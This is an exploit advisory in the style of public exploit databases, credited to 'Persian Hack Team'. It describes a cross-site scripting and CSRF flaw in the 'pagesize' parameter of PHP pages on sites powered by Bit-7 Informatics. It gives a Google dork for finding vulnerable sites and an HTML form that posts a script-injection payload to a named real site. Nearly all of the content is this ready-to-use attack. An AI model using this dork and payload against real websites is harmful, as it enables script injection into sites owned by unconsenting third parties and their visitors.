######################
# Exploit Title : Powered By Bit-7 Informatics CSRF XSS
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.bit7informatics.com/
# Google Dork : "intext:Powered By : Bit-7 Informatics" inurl:.php?id=
# Date: 2016/02/12
#
######################
# Vulnerable PHP File : /download.php
# /gallery.php
# /news.php
#
# Vulnerable Parameter : pagesize
# Exploit :
#
#<form id="form1" name="form1" method="post" action="http://dsaindia.org/news.php">
# <input name="pagesize" id="pagesize" value='"><script>alert("Mobham")</script>' />
# <input type="hidden" name="page" id="txtcpage" value="" />
# <input type="submit" value="GO!!">
# </form>
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################